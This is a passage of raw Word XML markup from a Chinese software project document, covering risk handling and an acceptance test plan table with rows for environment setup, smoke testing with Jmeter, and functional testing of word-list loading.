        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>风险分为可预期的和不可预期的，对于可预期的风险，可以要求资源，制定提前的应对措施。但是对于不可预期的风险，只能待出现时，充分考虑各方因素，及时调整。所以，对于可预期的风险，需要的能力是充分预估，对于不可预期的风险，需要的是及时察觉并调整应对。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1395C6C4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Toc223510668"/>
      <w:bookmarkStart w:id="224" w:name="_Toc227386484"/>
      <w:bookmarkStart w:id="225" w:name="_Toc224357934"/>
      <w:bookmarkStart w:id="226" w:name="_Toc227386341"/>
      <w:bookmarkStart w:id="227" w:name="_Toc36487907"/>
      <w:bookmarkStart w:id="228" w:name="_Toc36573226"/>
      <w:bookmarkStart w:id="229" w:name="_Toc36630303"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>准入测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
      <w:bookmarkEnd w:id="225"/>
      <w:bookmarkEnd w:id="226"/>
      <w:bookmarkEnd w:id="227"/>
      <w:bookmarkEnd w:id="228"/>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w14:paraId="73F6F79C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>说明准入测试中各测试内容的LIST和预期结果，其它内容可选</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1696"/>
        <w:gridCol w:w="1419"/>
        <w:gridCol w:w="1420"/>
        <w:gridCol w:w="1376"/>
        <w:gridCol w:w="1357"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="196674E5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="95B3D7"/>
          </w:tcPr>
          <w:p w14:paraId="64861488" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>分类</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="95B3D7"/>
          </w:tcPr>
          <w:p w14:paraId="06CE7ECD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试内容（可分级描述）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="95B3D7"/>
          </w:tcPr>
          <w:p w14:paraId="3AE32656" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>输入（可选）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="95B3D7"/>
          </w:tcPr>
          <w:p w14:paraId="37427CFF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>操作步骤（可选）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="95B3D7"/>
          </w:tcPr>
          <w:p w14:paraId="0CC20E9E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="95B3D7"/>
          </w:tcPr>
          <w:p w14:paraId="0BB77DEC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>辅助工具（可选）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7EB5E84B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A9F247A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>环境搭建</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1647010A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>依据上线步骤成功搭建测试环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CFF9042" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="334E1396" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="555232A3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>环境搭建成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D6D8C8D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4D4AF804" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="1080"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="239D74BE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>冒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A945B49" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>烟</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587EFD8C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AD1D1A2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E63EB4C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>依据</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试用例，逐条进行验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A46AC55" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644E1E1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E5DADC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>用例全部执行通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4409F6B9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Jmeter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="671ACF89" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50197F01" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2A2320" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试数据加载成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="549273B1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>准备线</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>上词表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="116D2AE4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24131B49" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>加载成功、日志记录准确</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1357" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C0A8AAD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:leftChars="200" w:left="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:smallCaps/>
